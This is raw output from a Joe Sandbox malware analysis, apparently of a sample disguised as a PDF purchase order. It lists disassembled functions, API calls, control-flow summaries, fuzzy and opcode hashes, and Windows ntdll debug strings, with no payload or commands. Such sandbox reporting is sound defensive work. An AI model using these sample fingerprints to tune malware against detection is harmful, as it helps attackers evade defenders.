                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_5_2_400000_PO 2025918 pdf.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: MessagePostThread
                                                                                • String ID: -4108694$-4108694
                                                                                • API String ID: 1836367815-789369925
                                                                                • Opcode ID: d6fd4bfa657c404ea0306360972ecf2cd5ee9aeebf6a95fb03983e269b39b940
                                                                                • Instruction ID: 8fc2ccc715d75f3af949a42b15c9b6a00aa3033adc5e71ade82c91b44118cde9
                                                                                • Opcode Fuzzy Hash: d6fd4bfa657c404ea0306360972ecf2cd5ee9aeebf6a95fb03983e269b39b940
                                                                                • Instruction Fuzzy Hash: 3301D6B1D0021C7ADB11AAE19CC1DEFBB7CDF41798F448069FA14B7241D6785E0687A5
                                                                                Function 00417AE3 Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 71libraryloaderCOMMON
                                                                                Download Yara Rule

                                                                                Control-flow Graph

                                                                                • Executed
                                                                                • Not Executed
                                                                                control_flow_graph 14 417ae3-417aec 15 417ad1-417ad7 LdrLoadDll 14->15 16 417aee-417aef 14->16 19 417ada-417add 15->19 17 417af1-417af6 16->17 18 417a98-417aa0 16->18 20 417af8-417b08 17->20 21 417b0f 17->21 22 417ab0-417ac1 call 42e0f3 18->22 23 417aa2-417aad call 42fee3 18->23 20->21 24 417b11-417b29 21->24 22->19 31 417ac3-417ad0 22->31 23->22 24->24 29 417b2b-417b3b 24->29 31->15
                                                                                APIs
                                                                                • LdrLoadDll.NTDLL(00000000,00000000,?,?), ref: 00417AD5
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000005.00000002.2453984968.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_5_2_400000_PO 2025918 pdf.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: Load
                                                                                • String ID: axD3
                                                                                • API String ID: 2234796835-3556351365
                                                                                • Opcode ID: 878dfedd390b4e169c5c909b9aebd42986a9202124793dd2abb74fc700858bd0
                                                                                • Instruction ID: 5f15b57304db88241ac4cc0d6c6d2276f5506b99c897ca4869340483d7a91710
                                                                                • Opcode Fuzzy Hash: 878dfedd390b4e169c5c909b9aebd42986a9202124793dd2abb74fc700858bd0
                                                                                • Instruction Fuzzy Hash: 94118671A442066BE700CBA5CC42BDFB7B8DF04768F14822AED2597281E374EA46C795
                                                                                Function 0042CCF3 Relevance: 1.5, APIs: 1, Instructions: 29memoryCOMMON
                                                                                Download Yara Rule

                                                                                Control-flow Graph

                                                                                • Executed
                                                                                • Not Executed
                                                                                control_flow_graph 89 42ccf3-42cd34 call 404993 call 42dbe3 RtlAllocateHeap
                                                                                APIs
                                                                                • RtlAllocateHeap.NTDLL(00000104,?,00424CFF,?,?,00424CFF,?,00000104,?,00009D57), ref: 0042CD2F
                                                                                Memory Dump Source
                                                                                • Source File: 00000005.00000002.2453984968.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_5_2_400000_PO 2025918 pdf.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: AllocateHeap
                                                                                • String ID:
                                                                                • API String ID: 1279760036-0
                                                                                • Opcode ID: 8af235827bdae546ae595d1eb37e2a3b6d82698474d1be62dc12886f45d2914b
                                                                                • Instruction ID: cb442fef8ab787463d58d4e17d22a99d0027002ea8d48f12f6d2fc59108ae3c9
                                                                                • Opcode Fuzzy Hash: 8af235827bdae546ae595d1eb37e2a3b6d82698474d1be62dc12886f45d2914b
                                                                                • Instruction Fuzzy Hash: 9FE06DB56042047BD620EF59EC41E9B77ACDFC8710F004019FA08A7241C675BD11CBB8
                                                                                Function 0042CD43 Relevance: 1.5, APIs: 1, Instructions: 29memoryCOMMON
                                                                                Download Yara Rule

                                                                                Control-flow Graph

                                                                                • Executed
                                                                                • Not Executed
                                                                                control_flow_graph 94 42cd43-42cd84 call 404993 call 42dbe3 RtlFreeHeap
                                                                                APIs
                                                                                • RtlFreeHeap.NTDLL(00000000,00000004,00000000,F845C700,00000007,00000000,00000004,00000000,004172CE,000000F4), ref: 0042CD7F
                                                                                Memory Dump Source
                                                                                • Source File: 00000005.00000002.2453984968.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_5_2_400000_PO 2025918 pdf.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: FreeHeap
                                                                                • String ID:
                                                                                • API String ID: 3298025750-0
                                                                                • Opcode ID: dab1178799a105d25c6e3316018af06c701a3083eb78f3c61f33bb5845b2359f
                                                                                • Instruction ID: 7395edaf297d5e7ca3aa9e3b0020c32f778f50e7afa72829ba8406197be42610
                                                                                • Opcode Fuzzy Hash: dab1178799a105d25c6e3316018af06c701a3083eb78f3c61f33bb5845b2359f
                                                                                • Instruction Fuzzy Hash: 2DE06DB66083047BD610EF59DC41F9B37ACDFC8710F004019FA08A7241C675B9108BB8
                                                                                Function 0042CD93 Relevance: 1.5, APIs: 1, Instructions: 25COMMON
                                                                                Download Yara Rule

                                                                                Control-flow Graph

                                                                                • Executed
                                                                                • Not Executed
                                                                                control_flow_graph 104 42cd93-42cdcc call 404993 call 42dbe3 ExitProcess
                                                                                APIs
                                                                                • ExitProcess.KERNEL32(?,00000000,00000000,?,9C41AA96,?,?,9C41AA96), ref: 0042CDC7
                                                                                Memory Dump Source
                                                                                • Source File: 00000005.00000002.2453984968.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_5_2_400000_PO 2025918 pdf.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: ExitProcess
                                                                                • String ID:
                                                                                • API String ID: 621844428-0
                                                                                • Opcode ID: 8b44ef5fd1ac1b24815c7711b62f7492f91eceab24c3cb0b3cc850fa7ca7bbda
                                                                                • Instruction ID: e9a4047e2e6157e7cf64b94a01f01a68d25e3d9aa703a6ddb621b4b25ad1c7a6
                                                                                • Opcode Fuzzy Hash: 8b44ef5fd1ac1b24815c7711b62f7492f91eceab24c3cb0b3cc850fa7ca7bbda
                                                                                • Instruction Fuzzy Hash: 8AE04F752002147BC520AA5ADC01F9B775CDFC5714F40402AFA08AB242C670B90087B5
                                                                                Function 016D2C0A Relevance: 1.5, APIs: 1, Instructions: 8libraryCOMMONLIBRARYCODE
                                                                                Download Yara Rule

                                                                                Control-flow Graph

                                                                                • Executed
                                                                                • Not Executed
                                                                                control_flow_graph 109 16d2c0a-16d2c0f 110 16d2c1f-16d2c26 LdrInitializeThunk 109->110 111 16d2c11-16d2c18 109->111
                                                                                APIs
                                                                                Memory Dump Source
                                                                                • Source File: 00000005.00000002.2459063328.0000000001660000.00000040.00001000.00020000.00000000.sdmp, Offset: 01660000, based on PE: true
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_5_2_1660000_PO 2025918 pdf.jbxd
                                                                                Similarity
                                                                                • API ID: InitializeThunk
                                                                                • String ID:
                                                                                • API String ID: 2994545307-0
                                                                                • Opcode ID: 7c0f213039a104e1e1568c6bc154d4a5b1874e273e67ef28718456ebb893e816
                                                                                • Instruction ID: ba76f9ab6ac0d39e23c2995f7bb9df5ffb78c63a8cf16095b39b44ae380ab899
                                                                                • Opcode Fuzzy Hash: 7c0f213039a104e1e1568c6bc154d4a5b1874e273e67ef28718456ebb893e816
                                                                                • Instruction Fuzzy Hash: 99B09B71D025C5C5DA52E7644E0C717794477D0701F15C165D2030751F4738C5D1E275

                                                                                Non-executed Functions

                                                                                Function 01748D10 Relevance: 37.8, Strings: 30, Instructions: 268COMMONLIBRARYCODE
                                                                                Download Yara Rule
                                                                                Strings
                                                                                • *** An Access Violation occurred in %ws:%s, xrefs: 01748F3F
                                                                                • *** Inpage error in %ws:%s, xrefs: 01748EC8
                                                                                • This failed because of error %Ix., xrefs: 01748EF6
                                                                                • If this bug ends up in the shipping product, it could be a severe security hole., xrefs: 01748DC4
                                                                                • The critical section is unowned. This usually implies a slow-moving machine due to memory pressure, xrefs: 01748E86
                                                                                • *** Resource timeout (%p) in %ws:%s, xrefs: 01748E02
                                                                                • *** Restarting wait on critsec or resource at %p (in %ws:%s), xrefs: 01748FEF
                                                                                • Go determine why that thread has not released the critical section., xrefs: 01748E75
                                                                                • This is usually the result of a memory copy to a local buffer or structure where the size is not properly calculated/checked., xrefs: 01748DB5
                                                                                • *** A stack buffer overrun occurred in %ws:%s, xrefs: 01748DA3
                                                                                • *** Unhandled exception 0x%08lx, hit in %ws:%s, xrefs: 01748D8C
                                                                                • a NULL pointer, xrefs: 01748F90
                                                                                • *** then kb to get the faulting stack, xrefs: 01748FCC
                                                                                • *** enter .cxr %p for the context, xrefs: 01748FBD
                                                                                • The resource is unowned. This usually implies a slow-moving machine due to memory pressure, xrefs: 01748E3F
                                                                                • The resource is owned shared by %d threads, xrefs: 01748E2E
                                                                                • *** enter .exr %p for the exception record, xrefs: 01748FA1
                                                                                • write to, xrefs: 01748F56
                                                                                • The critical section is owned by thread %p., xrefs: 01748E69
                                                                                • This means the data could not be read, typically because of a bad block on the disk. Check your hardware., xrefs: 01748F2D
                                                                                • The resource is owned exclusively by thread %p, xrefs: 01748E24
                                                                                • read from, xrefs: 01748F5D, 01748F62
                                                                                • The stack trace should show the guilty function (the function directly above __report_gsfailure)., xrefs: 01748DD3
                                                                                • *** Critical Section Timeout (%p) in %ws:%s, xrefs: 01748E4B
                                                                                • This means the machine is out of memory. Use !vm to see where all the memory is being used., xrefs: 01748F34
                                                                                • The instruction at %p referenced memory at %p., xrefs: 01748EE2
                                                                                • This means that the I/O device reported an I/O error. Check your hardware., xrefs: 01748F26
                                                                                • <unknown>, xrefs: 01748D2E, 01748D81, 01748E00, 01748E49, 01748EC7, 01748F3E
                                                                                • an invalid address, %p, xrefs: 01748F7F
                                                                                • The instruction at %p tried to %s , xrefs: 01748F66
                                                                                Memory Dump Source
                                                                                • Source File: 00000005.00000002.2459063328.0000000001660000.00000040.00001000.00020000.00000000.sdmp, Offset: 01660000, based on PE: true
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_5_2_1660000_PO 2025918 pdf.jbxd
                                                                                Similarity
                                                                                • API ID:
                                                                                • String ID: *** A stack buffer overrun occurred in %ws:%s$ *** An Access Violation occurred in %ws:%s$ *** Critical Section Timeout (%p) in %ws:%s$ *** Inpage error in %ws:%s$ *** Resource timeout (%p) in %ws:%s$ *** Unhandled exception 0x%08lx, hit in %ws:%s$ *** enter .cxr %p for the context$ *** Restarting wait on critsec or resource at %p (in %ws:%s)$ *** enter .exr %p for the exception record$ *** then kb to get the faulting stack$<unknown>$Go determine why that thread has not released the critical section.$If this bug ends up in the shipping product, it could be a severe security hole.$The critical section is owned by thread %p.$The critical section is unowned. This usually implies a slow-moving machine due to memory pressure$The instruction at %p referenced memory at %p.$The instruction at %p tried to %s $The resource is owned exclusively by thread %p$The resource is owned shared by %d threads$The resource is unowned. This usually implies a slow-moving machine due to memory pressure$The stack trace should show the guilty function (the function directly above __report_gsfailure).$This failed because of error %Ix.$This is usually the result of a memory copy to a local buffer or structure where the size is not properly calculated/checked.$This means that the I/O device reported an I/O error. Check your hardware.$This means the data could not be read, typically because of a bad block on the disk. Check your hardware.$This means the machine is out of memory. Use !vm to see where all the memory is being used.$a NULL pointer$an invalid address, %p$read from$write to
                                                                                • API String ID: 0-108210295
                                                                                • Opcode ID: 89cbc1e3e35c8229065121f953318cd4468060df0dbf3ede8091778059d9cbf4
                                                                                • Instruction ID: c0f5f027e035bb574e5ed26a57881539a454a573caf037448d9a53535cb2729f
                                                                                • Opcode Fuzzy Hash: 89cbc1e3e35c8229065121f953318cd4468060df0dbf3ede8091778059d9cbf4
                                                                                • Instruction Fuzzy Hash: 6281F575A44229BFDB21AA5DCC49EBFBF35FF5AB10F010148F6096F216E3758411CAA2
                                                                                Function 01712349 Relevance: 26.1, Strings: 20, Instructions: 1117COMMON
                                                                                Download Yara Rule
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000005.00000002.2459063328.0000000001660000.00000040.00001000.00020000.00000000.sdmp, Offset: 01660000, based on PE: true
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_5_2_1660000_PO 2025918 pdf.jbxd
                                                                                Similarity
                                                                                • API ID:
                                                                                • String ID: @$@$CFGOptions$DisableExceptionChainValidation$DisableHeapLookaside$ExecuteOptions$FrontEndHeapDebugOptions$GlobalFlag$GlobalFlag2$Initializing the application verifier package failed with status 0x%08lx$LdrpInitializeExecutionOptions$MaxDeadActivationContexts$MaxLoaderThreads$MinimumStackCommitInBytes$RaiseExceptionOnPossibleDeadlock$ShutdownFlags$TracingFlags$UnloadEventTraceDepth$UseImpersonatedDeviceMap$minkernel\ntdll\ldrinit.c
                                                                                • API String ID: 0-2160512332
                                                                                • Opcode ID: 29dc488e04adfd4febe926a518d43ba1d4bf61e866ff7755385c1165d9325dca
                                                                                • Instruction ID: aa9889d8c47b22913551357996b02baba02d8abd9f37ec9efc71c4392e746fcb
                                                                                • Opcode Fuzzy Hash: 29dc488e04adfd4febe926a518d43ba1d4bf61e866ff7755385c1165d9325dca
                                                                                • Instruction Fuzzy Hash: 2F929B71608342AFE721DE28CC80B6BF7E9BB84710F24492DFA95D7256D770E844CB96
                                                                                Function 016C8620 Relevance: 17.7, Strings: 14, Instructions: 223COMMON
                                                                                Download Yara Rule
                                                                                Strings
                                                                                • Critical section debug info address, xrefs: 0170541F, 0170552E
                                                                                • Initialization stack trace. Use dps to dump it if non-NULL., xrefs: 0170540A, 01705496, 01705519
                                                                                • Address of the debug info found in the active list., xrefs: 017054AE, 017054FA
                                                                                • Invalid debug info address of this critical section, xrefs: 017054B6
                                                                                • undeleted critical section in freed memory, xrefs: 0170542B
                                                                                • double initialized or corrupted critical section, xrefs: 01705508
                                                                                • Thread identifier, xrefs: 0170553A
                                                                                • Critical section address., xrefs: 01705502
                                                                                • corrupted critical section, xrefs: 017054C2
                                                                                • Second initialization stack trace. Use dps to dump it if non-NULL., xrefs: 017054CE
                                                                                • First initialization stack trace. Use dps to dump it if non-NULL., xrefs: 017054E2
                                                                                • Thread is in a state in which it cannot own a critical section, xrefs: 01705543
                                                                                • Critical section address, xrefs: 01705425, 017054BC, 01705534
                                                                                • 8, xrefs: 017052E3
                                                                                Memory Dump Source
                                                                                • Source File: 00000005.00000002.2459063328.0000000001660000.00000040.00001000.00020000.00000000.sdmp, Offset: 01660000, based on PE: true
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_5_2_1660000_PO 2025918 pdf.jbxd
                                                                                Similarity
                                                                                • API ID:
                                                                                • String ID: 8$Address of the debug info found in the active list.$Critical section address$Critical section address.$Critical section debug info address$First initialization stack trace. Use dps to dump it if non-NULL.$Initialization stack trace. Use dps to dump it if non-NULL.$Invalid debug info address of this critical section$Second initialization stack trace. Use dps to dump it if non-NULL.$Thread identifier$Thread is in a state in which it cannot own a critical section$corrupted critical section$double initialized or corrupted critical section$undeleted critical section in freed memory
                                                                                • API String ID: 0-2368682639
                                                                                • Opcode ID: b31ab8f63b26d643c6124f2a0c2874f66fc0acc0090af59d5cbff90f7a60c9cc
                                                                                • Instruction ID: 007e2caeb1fb2ac7ae096a38f4a2b632a55811a96d51ece2d99ee9bc9a9c36f3
                                                                                • Opcode Fuzzy Hash: b31ab8f63b26d643c6124f2a0c2874f66fc0acc0090af59d5cbff90f7a60c9cc
                                                                                • Instruction Fuzzy Hash: 70815AB1A41358EEEB21CF99CC45BAEFBF9EB09B14F204159F505B7280D3B5A941CB60
                                                                                Function 016C29F9 Relevance: 14.2, Strings: 11, Instructions: 411COMMON
                                                                                Download Yara Rule
                                                                                Strings
                                                                                • RtlpResolveAssemblyStorageMapEntry, xrefs: 0170261F
                                                                                • SXS: Assembly directory name stored in assembly information too long (%lu bytes) - ACTIVATION_CONTEXT_DATA at %p, xrefs: 017022E4
                                                                                • SXS: Unable to open assembly directory under storage root "%S"; Status = 0x%08lx, xrefs: 017025EB
                                                                                • SXS: Unable to resolve storage root for assembly directory %wZ in %Iu tries, xrefs: 017024C0
                                                                                • SXS: Attempt to insert well known storage root into assembly storage map assembly roster index %lu failed; Status = 0x%08lx, xrefs: 01702412
                                                                                • SXS: %s() bad parametersSXS: Map : %pSXS: Data : %pSXS: AssemblyRosterIndex: 0x%lxSXS: Map->AssemblyCount : 0x%lx, xrefs: 01702624
                                                                                • @, xrefs: 0170259B
                                                                                • SXS: Attempt to translate DOS path name "%S" to NT format failed, xrefs: 01702506
                                                                                • SXS: Attempt to probe assembly storage root %wZ for assembly directory %wZ failed with status = 0x%08lx, xrefs: 01702498
                                                                                • SXS: Storage resolution failed to insert entry to storage map; Status = 0x%08lx, xrefs: 01702602
                                                                                • SXS: Attempt to probe known root of assembly storage ("%wZ") failed; Status = 0x%08lx, xrefs: 01702409
                                                                                Memory Dump Source
                                                                                • Source File: 00000005.00000002.2459063328.0000000001660000.00000040.00001000.00020000.00000000.sdmp, Offset: 01660000, based on PE: true
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_5_2_1660000_PO 2025918 pdf.jbxd
                                                                                Similarity
                                                                                • API ID:
                                                                                • String ID: @$RtlpResolveAssemblyStorageMapEntry$SXS: %s() bad parametersSXS: Map : %pSXS: Data : %pSXS: AssemblyRosterIndex: 0x%lxSXS: Map->AssemblyCount : 0x%lx$SXS: Assembly directory name stored in assembly information too long (%lu bytes) - ACTIVATION_CONTEXT_DATA at %p$SXS: Attempt to insert well known storage root into assembly storage map assembly roster index %lu failed; Status = 0x%08lx$SXS: Attempt to probe assembly storage root %wZ for assembly directory %wZ failed with status = 0x%08lx$SXS: Attempt to probe known root of assembly storage ("%wZ") failed; Status = 0x%08lx$SXS: Attempt to translate DOS path name "%S" to NT format failed$SXS: Storage resolution failed to insert entry to storage map; Status = 0x%08lx$SXS: Unable to open assembly directory under storage root "%S"; Status = 0x%08lx$SXS: Unable to resolve storage root for assembly directory %wZ in %Iu tries
                                                                                • API String ID: 0-4009184096
                                                                                • Opcode ID: 02502ce8fe6ff046d272693c2a5eaca81f80aeb5fe959854ba9db0b0c8040b87
                                                                                • Instruction ID: 8674e35bab41e631af36498c8ee708baf9dc0525304411c6c34e7639bc96057c
                                                                                • Opcode Fuzzy Hash: 02502ce8fe6ff046d272693c2a5eaca81f80aeb5fe959854ba9db0b0c8040b87
                                                                                • Instruction Fuzzy Hash: FD0262B2D002299BDB71DB54CC94BE9F7B8AB54704F0141EEEA09A7242DB709E84CF59
                                                                                Function 01738B42 Relevance: 12.6, Strings: 10, Instructions: 146COMMON
                                                                                Download Yara Rule
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000005.00000002.2459063328.0000000001660000.00000040.00001000.00020000.00000000.sdmp, Offset: 01660000, based on PE: true
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_5_2_1660000_PO 2025918 pdf.jbxd
                                                                                Similarity
                                                                                • API ID:
                                                                                • String ID: DefaultBrowser_NOPUBLISHERID$SegmentHeap$csrss.exe$heapType$http://schemas.microsoft.com/SMI/2020/WindowsSettings$lsass.exe$runtimebroker.exe$services.exe$smss.exe$svchost.exe
                                                                                • API String ID: 0-2515994595
                                                                                • Opcode ID: 6903002841003fd40cb4af7369295939b917625b38bae8b6f997dc918afde3d1
                                                                                • Instruction ID: bd25d48b0f0e20ea763259efc8c3d0219ea275232a53d57d15f78ca3c162e7fd
                                                                                • Opcode Fuzzy Hash: 6903002841003fd40cb4af7369295939b917625b38bae8b6f997dc918afde3d1
                                                                                • Instruction Fuzzy Hash: B951AE715143019BD325CF288C48BABBBECEFD8654F144A6DB99983242E770D644CB93
                                                                                Function 016AAD00 Relevance: 11.8, Strings: 9, Instructions: 509COMMON
                                                                                Download Yara Rule
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000005.00000002.2459063328.0000000001660000.00000040.00001000.00020000.00000000.sdmp, Offset: 01660000, based on PE: true
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_5_2_1660000_PO 2025918 pdf.jbxd
                                                                                Similarity
                                                                                • API ID:
                                                                                • String ID: DLL name: %wZ$DLL search path passed in externally: %ws$LdrGetDllHandleEx$LdrpFindLoadedDllInternal$LdrpInitializeDllPath$Status: 0x%08lx$minkernel\ntdll\ldrapi.c$minkernel\ntdll\ldrfind.c$minkernel\ntdll\ldrutil.c
                                                                                • API String ID: 0-3197712848
                                                                                • Opcode ID: f15b766d3738b83f919346fa093e81b1543078996087b1fe510638ba495b9437
                                                                                • Instruction ID: 768b4958bb7e7b7765e83cc5e6a32f51caa0e85f6ae675db0a865a8621bd4a12
                                                                                • Opcode Fuzzy Hash: f15b766d3738b83f919346fa093e81b1543078996087b1fe510638ba495b9437
                                                                                • Instruction Fuzzy Hash: A912DF716083428BD325DB68CC80BAAB7E9FF84714F84495EFA858B391E734DD45CB92
                                                                                Function 01740274 Relevance: 10.3, Strings: 8, Instructions: 348COMMON
                                                                                Download Yara Rule
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000005.00000002.2459063328.0000000001660000.00000040.00001000.00020000.00000000.sdmp, Offset: 01660000, based on PE: true
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_5_2_1660000_PO 2025918 pdf.jbxd
                                                                                Similarity
                                                                                • API ID:
                                                                                • String ID: About to reallocate block at %p to %Ix bytes$About to rellocate block at %p to 0x%Ix bytes with tag %ws$HEAP: $HEAP[%wZ]: $Invalid allocation size - %Ix (exceeded %Ix)$Just reallocated block at %p to %Ix bytes$Just reallocated block at %p to 0x%Ix bytes with tag %ws$RtlReAllocateHeap
                                                                                • API String ID: 0-1700792311
                                                                                • Opcode ID: b6ab4884e6111d501aa1931de26579d9e06d1abdf0481de2daf73610ce4b206f
                                                                                • Instruction ID: c94804ea10fc84dbda0dc1b9f1451bb8b918d104a48dce887f55891e86f6fc0d
                                                                                • Opcode Fuzzy Hash: b6ab4884e6111d501aa1931de26579d9e06d1abdf0481de2daf73610ce4b206f
                                                                                • Instruction Fuzzy Hash: ECD1CE31600686DFDB22EF68C841AEDFBF2FF4A720F188149F6469B252C7749941CB55
                                                                                Function 017189B3 Relevance: 9.0, Strings: 7, Instructions: 259COMMON
                                                                                Download Yara Rule
                                                                                Strings
                                                                                • VerifierFlags, xrefs: 01718C50
                                                                                • AVRF: %ws: pid 0x%X: flags 0x%X: application verifier enabled, xrefs: 01718A3D
                                                                                • HandleTraces, xrefs: 01718C8F
                                                                                • AVRF: %ws: pid 0x%X: application verifier will be disabled due to an initialization error., xrefs: 01718A67
                                                                                • VerifierDebug, xrefs: 01718CA5
                                                                                • VerifierDlls, xrefs: 01718CBD
                                                                                • AVRF: -*- final list of providers -*- , xrefs: 01718B8F
                                                                                Memory Dump Source
                                                                                • Source File: 00000005.00000002.2459063328.0000000001660000.00000040.00001000.00020000.00000000.sdmp, Offset: 01660000, based on PE: true
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_5_2_1660000_PO 2025918 pdf.jbxd
                                                                                Similarity
                                                                                • API ID:
                                                                                • String ID: AVRF: %ws: pid 0x%X: application verifier will be disabled due to an initialization error.$AVRF: %ws: pid 0x%X: flags 0x%X: application verifier enabled$AVRF: -*- final list of providers -*- $HandleTraces$VerifierDebug$VerifierDlls$VerifierFlags
                                                                                • API String ID: 0-3223716464
                                                                                • Opcode ID: 8b923776b839ea89adb24d636b0b24292568fb1224331eac6dcad41f515ba262
                                                                                • Instruction ID: bfaf7ebd862d12c32827ec55c8e551b5e0c59ee2fe0c9186e1071b2f48f80727
                                                                                • Opcode Fuzzy Hash: 8b923776b839ea89adb24d636b0b24292568fb1224331eac6dcad41f515ba262
                                                                                • Instruction Fuzzy Hash: 269135B2685312AFD721EF6CCC80B6AFBA5FB94B24F14455CFA416B248C7309D01CB96
                                                                                Function 0169EA80 Relevance: 8.6, Strings: 6, Instructions: 1073COMMON
                                                                                Download Yara Rule
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000005.00000002.2459063328.0000000001660000.00000040.00001000.00020000.00000000.sdmp, Offset: 01660000, based on PE: true
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_5_2_1660000_PO 2025918 pdf.jbxd
                                                                                Similarity
                                                                                • API ID:
                                                                                • String ID: $LdrpResSearchResourceInsideDirectory Enter$LdrpResSearchResourceInsideDirectory Exit$R$T${
                                                                                • API String ID: 0-1109411897
                                                                                • Opcode ID: c73a0cdeb45a0403b41359c7333e4703092070fc66570a4f9f10dfcbeb136ef4
                                                                                • Instruction ID: 70bcc02bf7e8ee4a7376f3c923d7400c039508d4e717fe3ac2376193a14009ad
                                                                                • Opcode Fuzzy Hash: c73a0cdeb45a0403b41359c7333e4703092070fc66570a4f9f10dfcbeb136ef4
                                                                                • Instruction Fuzzy Hash: 43A24774A0562A8FDF64DF18CC887AABBB9EF45304F1542E9D909A7390DB319E81CF40
                                                                                Function 0169ADE0 Relevance: 8.1, Strings: 6, Instructions: 573COMMON
                                                                                Download Yara Rule
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000005.00000002.2459063328.0000000001660000.00000040.00001000.00020000.00000000.sdmp, Offset: 01660000, based on PE: true
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_5_2_1660000_PO 2025918 pdf.jbxd
                                                                                Similarity
                                                                                • API ID:
                                                                                • String ID: #$H$J$LdrpResSearchResourceMappedFile Enter$LdrpResSearchResourceMappedFile Exit$MUI
                                                                                • API String ID: 0-4098886588
                                                                                • Opcode ID: 3e00c68ffcb975ab5fbf74acc5483384d26f66d3afa2795df424d73713c073d0
                                                                                • Instruction ID: c4a5325f35e3bd1da501c2b8e8a6b9521714b6e34e591f6515b97ac4b414f113
                                                                                • Opcode Fuzzy Hash: 3e00c68ffcb975ab5fbf74acc5483384d26f66d3afa2795df424d73713c073d0
                                                                                • Instruction Fuzzy Hash: 6232BC719042698BEF22CB18DC98BAEBBB9BF45340F1440EAE949A7351D7319E81CF44
                                                                                Function 016C63FF Relevance: 7.8, Strings: 6, Instructions: 261COMMON
                                                                                Download Yara Rule
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000005.00000002.2459063328.0000000001660000.00000040.00001000.00020000.00000000.sdmp, Offset: 01660000, based on PE: true
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_5_2_1660000_PO 2025918 pdf.jbxd
                                                                                Similarity
                                                                                • API ID:
                                                                                • String ID: Delaying execution failed with status 0x%08lx$LDR:MRDATA: Process initialization failed with status 0x%08lx$NtWaitForSingleObject failed with status 0x%08lx, fallback to delay loop$Process initialization failed with status 0x%08lx$_LdrpInitialize$minkernel\ntdll\ldrinit.c
                                                                                • API String ID: 0-792281065
                                                                                • Opcode ID: ca98fc6b65942bbb2a845da587a472999663d833afad8fdb7e7f84b9a0524fba
                                                                                • Instruction ID: bc85aa46e0e3e93060ec262a30cf2ffc0582f7010298ea843f16e9a5eeb32669
                                                                                • Opcode Fuzzy Hash: ca98fc6b65942bbb2a845da587a472999663d833afad8fdb7e7f84b9a0524fba
                                                                                • Instruction Fuzzy Hash: F591F370B41315DBEB26DF18DC94BAEFBE1EB50B24F24812CEA066B385D7609842C795
                                                                                Function 0168645D Relevance: 7.6, Strings: 6, Instructions: 150COMMON
                                                                                Download Yara Rule
                                                                                Strings
                                                                                • Getting the shim engine exports failed with status 0x%08lx, xrefs: 016E9A01
                                                                                • LdrpInitShimEngine, xrefs: 016E99F4, 016E9A07, 016E9A30
                                                                                • Building shim engine DLL system32 filename failed with status 0x%08lx, xrefs: 016E99ED
                                                                                • Loading the shim engine DLL failed with status 0x%08lx, xrefs: 016E9A2A
                                                                                • apphelp.dll, xrefs: 01686496
                                                                                • minkernel\ntdll\ldrinit.c, xrefs: 016E9A11, 016E9A3A
                                                                                Memory Dump Source
                                                                                • Source File: 00000005.00000002.2459063328.0000000001660000.00000040.00001000.00020000.00000000.sdmp, Offset: 01660000, based on PE: true
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_5_2_1660000_PO 2025918 pdf.jbxd
                                                                                Similarity
                                                                                • API ID:
                                                                                • String ID: Building shim engine DLL system32 filename failed with status 0x%08lx$Getting the shim engine exports failed with status 0x%08lx$LdrpInitShimEngine$Loading the shim engine DLL failed with status 0x%08lx$apphelp.dll$minkernel\ntdll\ldrinit.c
                                                                                • API String ID: 0-204845295
                                                                                • Opcode ID: 71987d99058bb14b176d2a744a3a2f84366b18ebf601a3246f167d5c3b69aecd
                                                                                • Instruction ID: 5e8fd23b264cac80f9e4b57ff15bb55df8a5dc493e0fddd517432a5a19bd9c81
                                                                                • Opcode Fuzzy Hash: 71987d99058bb14b176d2a744a3a2f84366b18ebf601a3246f167d5c3b69aecd
                                                                                • Instruction Fuzzy Hash: BE51B0712483019BD720EF28DC85AAB77E5EF84B58F104A1DE98697250DB30E945CB92
                                                                                Function 016C2674 Relevance: 7.6, Strings: 6, Instructions: 110COMMON
                                                                                Download Yara Rule
                                                                                Strings
